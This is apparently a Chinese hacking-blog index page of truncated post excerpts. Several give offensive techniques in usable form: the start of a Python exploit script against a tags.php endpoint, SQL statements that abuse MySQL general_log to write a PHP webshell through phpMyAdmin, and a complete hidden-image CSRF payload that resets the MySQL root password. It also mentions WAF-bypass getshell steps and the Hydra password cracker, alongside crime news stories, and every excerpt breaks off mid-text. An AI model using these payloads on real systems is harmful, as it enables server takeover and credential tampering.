利用脚本python：

#!/usr/bin/env python
'''/*
* author = Mochazz
* team = 红日安全团队
* env = pyton3
*
*/
'''
import requests
import itertools
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://192.168.1.9/tags.php"
data = {
"_FILES[mochazz][tmp_name[......]

继续阅读

央广网西安8月19日消息(记者温超陕西台记者拓紫云)据中国之声《新闻纵横》报道，近年来，比特币等虚拟货币以极其快速的资产价格涨幅，成为全球市场关注的焦点，而其安全问题也备受关注。据国外媒体报道称，仅在2018年上半年，“黑客”就窃取了价值7.31亿美元，约合人民币48亿元的加密货币。而在国内，西安警方日前成功破获一起网络“黑客”盗窃虚拟货币案件，涉案金额高达6亿元人民币。破获这起案件历时半年多，破案的经过如何？虚拟货币到底哪里不安全？持有虚拟货币又该注意哪些安全问题？

今年3月30日，西安市公安局经开分局接到一名张姓男子报警称，他的个人电脑疑似被非法入侵，大量虚拟货币一夜之间被洗劫一空，[......]

继续阅读

一、更新

#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-[......]

继续阅读

三个sql语句拿下phpmyadmin的shell

首先要知道路径

一句一句的执行

---------------------------------------------------------
set global general_log='on';
---------------------------------------------------------
SET global general_log_file='D:/webshell/www/cmd.php';
---------------------------------------------[......]

继续阅读

修改root密码：

保存为：webshell.html

<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" />

密码为：www.webshell.cc

写文件

首先你要知道路径

保存为：webshell.html
[......]

继续阅读

以Windows 2003为例，启动Windows 2003组策略

点“开始”，在“运行”中敲入gpedit.msc依次展开“用户配置”→“管理模板”→“系统”子键，此时可以看到一个“不要运行指定的Windows应用程序”选项，双击该选项，在“策略”选项卡中选择“启用”选项，启动Windows 2003禁止运行指定应用程序的功能，单击“不允许的应用程序的列表”中的“显示”按钮，打开列表框，在列表框中单击“添加”，打开“添加项目”窗口，然后在该窗口中输入需要禁止运行的程序名（可以不输入路径），比方说要禁用注册表编辑器，则输入 sethc.exe ，接着点击“确定”，即可禁止该应用程序的运行[......]

继续阅读

Burp已经成了绿帽子门必不可少的工具，相信大家都装有Java环境，本软件支持1.7+以及所有安装了环境的系统。1.6后续会考虑兼容。 一直都有想写一款真正实用的跨平台类似的菜刀，然后可惜代码是个渣渣一直可望而不可即，后续随着公司业务增多，大多数目标都有WAF，于是就想写一款完全脱离工具，只依靠配置文件的菜刀。顺便当个码农~~~ 前前后后大约花了一个月，除了打飞机的时间基本就在写这货了，这里要感谢@MelodyZX  牛，在我完成大体框架后，帮了我不少大忙，包括完成虚拟终端，非常感谢。 程序采用java语言编写，数据库采用了sqlite，本来想使用access，但是在jdk1.8以后移除了该功[......]

继续阅读

21岁的男子胡某在购买优酷会员礼包时发现，在自己账户余额不足时，支付宝平台会向其账户退款。于是从2015年9月起，胡某利用自己偶然发现的这一系统漏洞，半年里窃取优酷网所属的合一信息技术(北京)有限公司(下称合一公司)10余万笔资金，共计1300余万元。

如此巨款，胡某除了自己消费挥霍外，还拿出其中的400多万打赏了网络直播网站的女主播，其中最多的一次，“赏”了女主播5万元。今天上午，市一中院开庭审理了胡某涉嫌盗窃罪一案，胡某承认了检方的指控。

意外发现系统漏洞

今天上午，黑框眼镜、身材矮小的胡某被法警带入法庭。“我在公安机关的供述都属实，检察机关对我的指控也都属实。”胡某的回[......]

继续阅读

Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

Hydra was tested to compile on Linux, Windows/Cy[......]

继续阅读

旁白：在一个有WAF、并且mysql中的Into outfile禁用的情况下，我该如何getshell？
首先环境如下：

• OS:Windows 2003
• WAF:Safe Dog 4.0正式版
• phpmyadmin:4.7（许多都可以）
• Mysql:5.5+
• PHP:5.3
• Apache:2.x

目前

into outfile

已经被禁用，并且WAF也会在写入文件的时候拦截。
那么我们尝试通过一个脑洞大开的方法去getshell。

（必须是mysql root权限）

登录phpmyadmin后，查看全局变量：
找到

general[......]

继续阅读